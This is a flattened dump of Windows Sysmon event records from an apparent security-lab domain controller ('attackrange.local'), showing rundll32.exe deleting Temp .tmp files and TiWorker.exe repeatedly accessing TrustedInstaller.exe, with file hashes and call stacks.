23542300x80000000000000005848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.001{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA91E.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:24.001{266CAFBE-64CF-6064-B300-00000000AE01}5164ATTACKRANGE\AdministratorC:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\RGIA8DE.tmpMD5=3006752A2BCFEDA0F75D551EA656B2EF,SHA256=DFD64231860C732DCED3DC78627A7844A08D5D3E4CD253FD81186BAE33CC368A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.979{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 23542300x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:25.963{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F30730F8B66C555FA940B332B9E506FB,SHA256=6972671557DFC063E47AAD1D3543F54CA0F3DE9E577AB29D402E20468494152F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.963{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.948{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000006089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:25.932{266CAFBE-6472-6064-2400-00000000AE01}29722992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe{266CAFBE-6472-6064-2300-00000000AE01}2932C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4227_none_7f12d43621e57eca\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 